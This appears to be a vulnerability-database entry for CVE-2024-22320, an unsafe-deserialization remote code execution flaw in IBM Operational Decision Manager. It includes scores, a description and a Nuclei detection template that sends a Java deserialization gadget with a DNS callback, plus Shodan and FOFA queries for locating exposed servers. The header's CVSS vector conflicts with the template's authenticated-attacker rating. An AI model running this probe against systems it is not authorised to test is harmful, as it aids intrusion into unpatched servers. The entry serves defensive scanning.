CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
97.6%
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
id: CVE-2024-22320
info:
name: IBM Operational Decision Manager - Java Deserialization
author: DhiyaneshDK
severity: high
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
reference:
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-22320
cwe-id: CWE-502
epss-score: 0.38316
epss-percentile: 0.97125
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query:
- html:"IBM ODM"
- http.html:"ibm odm"
fofa-query:
- title="IBM ODM"
- title="ibm odm"
- body="ibm odm"
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
http:
- method: GET
path:
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'javax.servlet.ServletException'
- type: status
status:
- 500
# digest: 490a0046304402205e4a4d30e6df6808d0ce17438a6f11b8c61b769082b39c9bacf8f08ef85f53a402201b25e55f56c429758e34758316d597f7c019ee6fbec6b0b8e127886e429fd275:922c64590222798bb761d5b6d8e72950
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
97.6%